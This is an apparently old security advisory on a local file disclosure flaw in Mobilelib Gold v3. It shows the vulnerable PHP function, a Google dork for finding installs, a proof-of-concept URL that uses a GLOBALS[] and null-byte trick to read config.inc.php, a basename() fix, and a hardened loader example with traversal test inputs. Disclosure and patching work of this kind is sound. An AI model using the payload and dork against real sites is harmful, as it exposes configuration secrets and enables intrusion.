
# Title : Mobilelib Gold v3 Local File Disclosure Vulnerability
# Published : 2009-07-14
# Author : Qabandi


||          ||   | ||
                                     o_,_7 _||  . _o_7 _|| q_|_||  o_\_,
                                    (  :  /    (_)    /           (      .

                                             ___________________
                                           _/QQQQQQQQQQQQQQQQQQQ__
                                        __/QQQ/````````````````QQQ___
                                      _/QQQQQ/                  QQQQQQ
                                     /QQQQ/``                    ```QQQQ
                                    /QQQQ/                          QQQQ
                                   |QQQQ/    By  Qabandi             QQQQ|
                                   |QQQQ|                            |QQQQ|
                                   |QQQQ|    From Kuwait, PEACE...   |QQQQ|
                                   |QQQQ|                            |QQQQ|
                                   |QQQQ       iqa[a]hotmail.fr     /QQQQ|
                                    QQQQ                      __  /QQQQ/
                                     QQQQ                    /QQ_QQQQ/
                                      QQQQ                   QQQQQQQ/
                                       QQQQQ                 /QQQQQ/_
                                        ``QQQQQ_____________/QQQ/QQQQ_
                                           ``QQQQQQQQQQQQQQQQQQQ/  `QQQQ
                                              ```````````````````     `````

=Vuln:		Mobilelib Gold v3 Local File Disclosure Vulnerability
=INFO:		http://www.ac4p.com/
=BUY:  		http://www.ac4p.com/
=Download:      ~~~
=DORK:		intext:"English for dummies"

                                  ____________
                              _-=/:Conditions:=-_
````````````````````````````````````````````````````````````````````````````````

Magic_quotes MUST BE ON :)

---------------------------------------===--------------------------------------

                                _________________
                            _-=/:Vulnerable_Code:=-_
````````````````````````````````````````````````````````````````````````````````
// in "./myhtml.php"

function getthememyhtml($page)
      {
      // $page is concatenated into the path with no validation of its contents
      if (file_exists("./myhtmlpages/".$page.".html")) {
      $templat="./myhtmlpages/".$page.".html";
      $tempindex=@fopen($templat,"r");
      $html=@fread($tempindex,@filesize($templat));
      @fclose($tempindex);
      } else {
       $html ="<p align=\"center\"> ???£ ?-?“?????? ?…?-?????? ?£???? ????????????.</p>";
      }
      return $html;
}

---------------------------------------===--------------------------------------

                                     _______
                                 _-=/:P.o.C:=-_
````````````````````````````````````````````````````````````````````````````````
 We will bypass the application's input filter, which scans every _GET variable
 for harmful input such as the null char (%00), etc.
 
 We will bypass it by using an old GLOBALS[] trick ;)


http://localhost/goldv3/myhtml.php?GLOBALS[page]=../config.inc.php%00


---------------------------------------===--------------------------------------

                                    __________
                                _-=/:SOLUTION:=-_
````````````````````````````````````````````````````````````````````````````````
// in "./myhtml.php"

function getthememyhtml($page)
      {
      $page = basename($page); //<---- Added the good old Basename func ;)
      if (file_exists("./myhtmlpages/".$page.".html")) {
      $templat="./myhtmlpages/".$page.".html";
      $tempindex=@fopen($templat,"r");
      $html=@fread($tempindex,@filesize($templat));
      @fclose($tempindex);
      } else {
       $html ="<p align=\"center\"> ???£ ?-?“?????? ?…?-?????? ?£???? ????????????.</p>";
      }
      return $html;
}
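
Added example (not part of the original advisory and not Mobilelib Gold's own code): a stricter loader that goes beyond the basename() fix by validating the page name at the point of use, so the check holds however $page was populated, and by confirming the resolved path stays inside the pages directory. The function name load_static_page, the allowlist pattern and the temporary fixture are assumptions made for illustration.

```php
<?php
// Added example: hypothetical hardened loader, not Mobilelib Gold code.
function load_static_page($page, string $baseDir): ?string
{
    // Reject arrays (e.g. ?page[]=x) and anything outside a strict allowlist.
    // \A...\z anchors the whole string, so "../", "/", "." and NUL bytes never match.
    if (!is_string($page) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $page)) {
        return null;
    }

    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }

    // Resolve symlinks and confirm the result still lives inside the base directory.
    $real = realpath($base . DIRECTORY_SEPARATOR . $page . '.html');
    if ($real === false || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0 || !is_file($real)) {
        return null;
    }

    $html = file_get_contents($real);
    return $html === false ? null : $html;
}

// Constructed fixture: a temporary pages directory next to a file that must stay private.
$root = sys_get_temp_dir() . '/mlg_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/myhtmlpages', 0700, true);
file_put_contents($root . '/myhtmlpages/about.html', '<p>about</p>');
file_put_contents($root . '/config.inc.php', '<?php /* constructed secret */');

// Constructed inputs: one valid page name, then values the loader must refuse.
$inputs = ['about', '../config.inc.php', "../config.inc.php\0", 'about.html', ['about'], ''];
foreach ($inputs as $input) {
    $result = load_static_page($input, $root . '/myhtmlpages');
    printf("%-28s => %s\n", json_encode($input), $result === null ? 'rejected' : 'served');
}

// Clean up the constructed fixture.
unlink($root . '/myhtmlpages/about.html');
unlink($root . '/config.inc.php');
rmdir($root . '/myhtmlpages');
rmdir($root);
```

Only the first constructed input ('about') is served; every other value is rejected before any file is opened.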


---------------------------------------===--------------------------------------
 ______________________________________________________________________________
/                                                                              
|      Sec-Code.com ;)  Shru7at Iktshaf al-thaghrat Qareeban!!il7ag sajjil!!   |
______________________________________________________________________________/
                                 No More Private /
                                 `````````````````
                           Salamz to All Muslim Hackers.
